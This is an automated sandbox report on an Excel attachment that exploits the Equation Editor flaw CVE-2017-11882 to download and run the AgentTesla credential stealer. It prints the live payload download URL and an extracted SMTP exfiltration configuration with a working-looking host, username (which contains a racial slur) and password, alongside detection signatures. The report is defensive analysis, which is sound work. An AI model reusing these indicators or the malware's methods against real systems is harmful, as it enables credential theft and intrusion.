Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Inquiry N TM24-10-09.xlam.xlsx

Overview

General Information

Sample name:Inquiry N TM24-10-09.xlam.xlsx
Analysis ID:1530597
MD5:c4d3d1b1842e510619920b9492900250
SHA1:25749eb1073ce81fd72314dda9efab61adb70b3f
SHA256:f8fb6c4ac020b9b8116781833ad5f536979a2e21986601c55928a2bfcc3036ce
Tags:CVE-2017-11882xlamxlsxuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Contains functionality to detect sleep reduction / modifications
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3356 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3564 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • zwuonypqu.exe (PID: 3708 cmdline: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe MD5: E393C90747E935149ECABF5AF936A07A)
        • RegSvcs.exe (PID: 3736 cmdline: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.worlorderbillions.top", "Username": "niggabgee5thfeb24@worlorderbillions.top", "Password": "ORKSEMuW*kNA                 "}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0xd94aa:$s1: <legacyDrawing r:id="
  • 0xd94d2:$s2: <oleObject progId="
  • 0xd9519:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.478380635.0000000000310000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x33541:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x335b3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x3363d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x336cf:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x33739:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x337ab:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x33841:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x338d1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
      00000006.00000002.627037651.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.627037651.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 5 entries
          SourceRuleDescriptionAuthorStrings
          5.2.zwuonypqu.exe.310000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.zwuonypqu.exe.310000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              5.2.zwuonypqu.exe.310000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
              • 0x31741:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
              • 0x317b3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
              • 0x3183d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
              • 0x318cf:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
              • 0x31939:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
              • 0x319ab:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
              • 0x31a41:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
              • 0x31ad1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
              5.2.zwuonypqu.exe.310000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                5.2.zwuonypqu.exe.310000.0.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 4 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.21.53.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3564, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3564, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ng5th[1].exe

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3564, Protocol: tcp, SourceIp: 104.21.53.112, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Jason Lynch: Data: Command: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, CommandLine: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3564, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, ProcessId: 3708, ProcessName: zwuonypqu.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, CommandLine: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3564, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, ProcessId: 3708, ProcessName: zwuonypqu.exe
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, CommandLine: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, ParentImage: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, ParentProcessId: 3708, ParentProcessName: zwuonypqu.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe, ProcessId: 3736, ProcessName: RegSvcs.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3564, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-10T09:40:28.203790+020020225501A Network Trojan was detected192.168.2.2249163104.21.53.11280TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Inquiry N TM24-10-09.xlam.xlsxAvira: detected
                  Source: 5.2.zwuonypqu.exe.310000.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.worlorderbillions.top", "Username": "niggabgee5thfeb24@worlorderbillions.top", "Password": "ORKSEMuW*kNA "}
                  Source: http://eficienciaeningenieria.com.mx/vnkl/ng5th.exeVirustotal: Detection: 13%Perma Link
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ng5th[1].exeReversingLabs: Detection: 47%
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ng5th[1].exeVirustotal: Detection: 47%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeReversingLabs: Detection: 47%
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeVirustotal: Detection: 47%Perma Link
                  Source: Inquiry N TM24-10-09.xlam.xlsxReversingLabs: Detection: 71%
                  Source: Inquiry N TM24-10-09.xlam.xlsxVirustotal: Detection: 51%Perma Link
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ng5th[1].exeJoe Sandbox ML: detected

                  Exploits

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 104.21.53.112 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\zwuonypqu.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: wntdll.pdb source: zwuonypqu.exe, 00000005.00000003.477048831.0000000003BA0000.00000004.00001000.00020000.00000000.sdmp, zwuonypqu.exe, 00000005.00000003.477112588.0000000003D00000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452126
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,5_2_0045C999
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,5_2_00436ADE
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00434BEE
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,5_2_00436D2D
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442E1F
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0045DD7C FindFirstFileW,FindClose,5_2_0045DD7C
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD29
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00475FE5
                  Source: C:\Users\user\AppData\Local\Temp\zwuonypqu.exeCode function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8D

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520541 URLDownloadToFileW,2_2_03520541
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0352058C WinExec,ExitProcess,2_2_0352058C
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035204AE LoadLibraryW,URLDownloadToFileW,2_2_035204AE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035204C8 URLDownloadToFileW,2_2_035204C8
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520401 ExitProcess,2_2_03520401
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03520436 URLDownloadToFileW,2_2_03520436
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035205AC ExitProcess,2_2_035205AC
                  Source: global trafficDNS query: name: eficienciaeningenieria.com.mx
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.112:80
                  Source: global trafficTCP traffic: 104.21.53.112:80 -> 192.168.2.22:49163
